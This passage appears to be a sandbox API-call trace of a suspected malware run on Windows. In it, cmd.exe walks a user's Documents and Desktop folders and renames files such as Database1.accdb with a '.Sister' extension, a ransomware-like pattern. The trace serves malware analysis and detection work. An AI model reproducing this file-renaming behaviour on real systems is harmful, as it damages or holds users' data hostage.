lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", fInfoLevelId=0x1, lpFindFileData=0x21ed937c850, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed937c850) returned 0x21ed8c7cee0 [0304.286] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0304.286] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0304.286] ??_V@YAXPEAX@Z () returned 0x1 [0304.286] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0304.294] FindNextFileW (in: hFindFile=0x21ed8c7cee0, lpFindFileData=0x21ed937c850 | out: lpFindFileData=0x21ed937c850*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Database1.accdb", cAlternateFileName="")) returned 0 [0304.296] GetLastError () returned 0x12 [0304.296] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0304.296] ??_V@YAXPEAX@Z () returned 0x1 [0304.296] ??_V@YAXPEAX@Z () returned 0x1 [0304.296] ??_V@YAXPEAX@Z () returned 0x1 [0304.296] ??_V@YAXPEAX@Z () returned 0x1 [0304.297] GetProcessHeap () returned 0x21ed8c70000 [0304.297] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cee0 [0304.297] GetProcessHeap () returned 0x21ed8c70000 [0304.297] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95a40, Size=0x16) returned 0x21ed8c95be0 [0304.297] GetProcessHeap () returned 0x21ed8c70000 [0304.297] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95be0) returned 0x16 [0304.297] GetProcessHeap () returned 0x21ed8c70000 [0304.297] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45d40, Size=0x20) returned 0x21ed8d45c50 [0304.297] GetProcessHeap () returned 0x21ed8c70000 [0304.297] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45c50) returned 0x20 [0304.297] GetProcessHeap () returned 0x21ed8c70000 [0304.297] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6b980 [0304.297] GetProcessHeap () returned 0x21ed8c70000 [0304.297] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b980, Size=0xb2) returned 0x21ed8c96880 [0304.297] GetProcessHeap () returned 0x21ed8c70000 [0304.297] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c96880) returned 0xb2 [0304.298] GetProcessHeap () returned 0x21ed8c70000 [0304.298] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0b40 [0304.298] GetProcessHeap () returned 0x21ed8c70000 [0304.298] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0b40, Size=0x30) returned 0x21ed93b0b40 [0304.298] GetProcessHeap () returned 0x21ed8c70000 [0304.298] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0b40) returned 0x30 [0304.298] GetProcessHeap () returned 0x21ed8c70000 [0304.298] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0b80 [0304.298] malloc (_Size=0x1ff9c) returned 0x21eda15ff40 [0304.299] GetProcessHeap () returned 0x21ed8c70000 [0304.299] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96940 [0304.299] GetProcessHeap () returned 0x21ed8c70000 [0304.299] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b5130 [0304.299] ??_V@YAXPEAX@Z () returned 0x1 [0304.299] malloc (_Size=0x1ff9c) returned 0x21eda15ff40 [0304.299] GetProcessHeap () returned 0x21ed8c70000 [0304.299] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b6ab0 [0304.299] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda15ff40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0304.299] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ca60 [0304.300] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0304.300] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ca60 [0304.300] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0304.300] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7ca60 [0304.300] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0304.300] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0304.301] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.301] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.301] GetProcessHeap () returned 0x21ed8c70000 [0304.301] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67430 [0304.301] ??_V@YAXPEAX@Z () returned 0x1 [0304.301] ??_V@YAXPEAX@Z () returned 0x1 [0304.301] GetProcessHeap () returned 0x21ed8c70000 [0304.301] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0b80, Size=0x490) returned 0x21ed93b0b80 [0304.301] GetProcessHeap () returned 0x21ed8c70000 [0304.301] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0b80) returned 0x490 [0304.301] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0304.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.301] GetFileType (hFile=0x50) returned 0x2 [0304.301] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.301] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0304.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.303] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0304.310] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.311] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.311] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0304.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.311] GetFileType (hFile=0x50) returned 0x2 [0304.311] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.311] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0304.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.311] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0304.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.312] GetFileType (hFile=0x50) returned 0x2 [0304.312] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.312] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.313] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b0b50*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed93b0b50*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0304.313] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0304.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.313] GetFileType (hFile=0x50) returned 0x2 [0304.313] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.313] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0304.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.314] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0304.320] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0304.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.320] GetFileType (hFile=0x50) returned 0x2 [0304.321] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.321] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.321] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0304.326] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.326] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.326] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.326] malloc (_Size=0xffce) returned 0x21eda15ff40 [0304.326] ??_V@YAXPEAX@Z () returned 0x21eda15ff40 [0304.326] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.326] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.327] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.327] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.327] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.327] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.327] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.327] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.327] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.327] ??_V@YAXPEAX@Z () returned 0x1 [0304.327] GetProcessHeap () returned 0x21ed8c70000 [0304.327] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5eb40 [0304.327] GetProcessHeap () returned 0x21ed8c70000 [0304.327] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5eb40, Size=0x130) returned 0x21ed8d62a90 [0304.327] GetProcessHeap () returned 0x21ed8c70000 [0304.327] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62a90) returned 0x130 [0304.327] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.327] malloc (_Size=0xffce) returned 0x21eda15ff40 [0304.327] ??_V@YAXPEAX@Z () returned 0x21eda15ff40 [0304.327] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.328] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda15ff40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0304.329] ??_V@YAXPEAX@Z () returned 0x1 [0304.329] GetProcessHeap () returned 0x21ed8c70000 [0304.329] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62bd0 [0304.329] GetProcessHeap () returned 0x21ed8c70000 [0304.329] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f720 [0304.329] GetProcessHeap () returned 0x21ed8c70000 [0304.329] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f720, Size=0x130) returned 0x21ed8d62450 [0304.330] GetProcessHeap () returned 0x21ed8c70000 [0304.330] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62450) returned 0x130 [0304.330] malloc (_Size=0xffce) returned 0x21eda15ff40 [0304.330] ??_V@YAXPEAX@Z () returned 0x21eda15ff40 [0304.330] GetProcessHeap () returned 0x21ed8c70000 [0304.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ca60 [0304.330] GetProcessHeap () returned 0x21ed8c70000 [0304.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937d950 [0304.330] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.330] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.330] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.330] GetLastError () returned 0x2 [0304.330] GetProcessHeap () returned 0x21ed8c70000 [0304.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8ce96c0 [0304.330] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8ce96d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.331] SetErrorMode (uMode=0x0) returned 0x0 [0304.331] SetErrorMode (uMode=0x1) returned 0x0 [0304.331] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda15ff40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0304.331] SetErrorMode (uMode=0x0) returned 0x1 [0304.331] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0304.331] GetProcessHeap () returned 0x21ed8c70000 [0304.331] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937dbc0 [0304.331] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.331] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.331] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.331] GetLastError () returned 0x2 [0304.331] ??_V@YAXPEAX@Z () returned 0x1 [0304.331] malloc (_Size=0xffce) returned 0x21eda15ff40 [0304.331] ??_V@YAXPEAX@Z () returned 0x21eda15ff40 [0304.332] malloc (_Size=0xffce) returned 0x21eda16ff20 [0304.332] ??_V@YAXPEAX@Z () returned 0x21eda16ff20 [0304.332] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.332] GetLastError () returned 0x2 [0304.332] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.332] GetFileType (hFile=0x54) returned 0x2 [0304.332] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0304.332] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0304.334] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.334] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0304.335] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.335] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.335] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0304.340] longjmp () [0304.340] ??_V@YAXPEAX@Z () returned 0x1 [0304.340] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0304.340] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x886b0360, ftCreationTime.dwHighDateTime=0x1d5e014, ftLastAccessTime.dwLowDateTime=0xe54857a0, ftLastAccessTime.dwHighDateTime=0x1d5b5b1, ftLastWriteTime.dwLowDateTime=0xe54857a0, ftLastWriteTime.dwHighDateTime=0x1d5b5b1, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="epjQhKzUeRgVOT.pptx", cAlternateFileName="")) returned 1 [0304.344] GetProcessHeap () returned 0x21ed8c70000 [0304.344] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d290, Size=0xe0) returned 0x21ed8c95c40 [0304.344] GetProcessHeap () returned 0x21ed8c70000 [0304.344] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95c40) returned 0xe0 [0304.344] GetProcessHeap () returned 0x21ed8c70000 [0304.344] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d571c0 [0304.344] GetProcessHeap () returned 0x21ed8c70000 [0304.344] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d571c0, Size=0x30) returned 0x21ed8d571c0 [0304.345] GetProcessHeap () returned 0x21ed8c70000 [0304.345] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d571c0) returned 0x30 [0304.345] GetProcessHeap () returned 0x21ed8c70000 [0304.345] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d57200 [0304.345] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.345] GetProcessHeap () returned 0x21ed8c70000 [0304.345] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8c90 [0304.345] ??_V@YAXPEAX@Z () returned 0x1 [0304.345] GetProcessHeap () returned 0x21ed8c70000 [0304.345] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d57200, Size=0x1b0) returned 0x21ed8d57200 [0304.345] GetProcessHeap () returned 0x21ed8c70000 [0304.345] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57200) returned 0x1b0 [0304.345] GetProcessHeap () returned 0x21ed8c70000 [0304.345] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d573c0 [0304.345] GetProcessHeap () returned 0x21ed8c70000 [0304.345] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d573c0, Size=0x290) returned 0x21ed8d573c0 [0304.345] GetProcessHeap () returned 0x21ed8c70000 [0304.345] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d573c0) returned 0x290 [0304.346] GetProcessHeap () returned 0x21ed8c70000 [0304.346] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d57660 [0304.346] GetProcessHeap () returned 0x21ed8c70000 [0304.346] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d57660, Size=0x30) returned 0x21ed8d57660 [0304.346] GetProcessHeap () returned 0x21ed8c70000 [0304.346] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57660) returned 0x30 [0304.346] GetProcessHeap () returned 0x21ed8c70000 [0304.346] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d576a0 [0304.346] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.346] GetProcessHeap () returned 0x21ed8c70000 [0304.346] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8cd0 [0304.346] ??_V@YAXPEAX@Z () returned 0x1 [0304.346] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.346] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0xd, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cac0 [0304.346] FindClose (in: hFindFile=0x21ed8c7cac0 | out: hFindFile=0x21ed8c7cac0) returned 1 [0304.347] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0xd, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cc40 [0304.347] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0304.347] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, 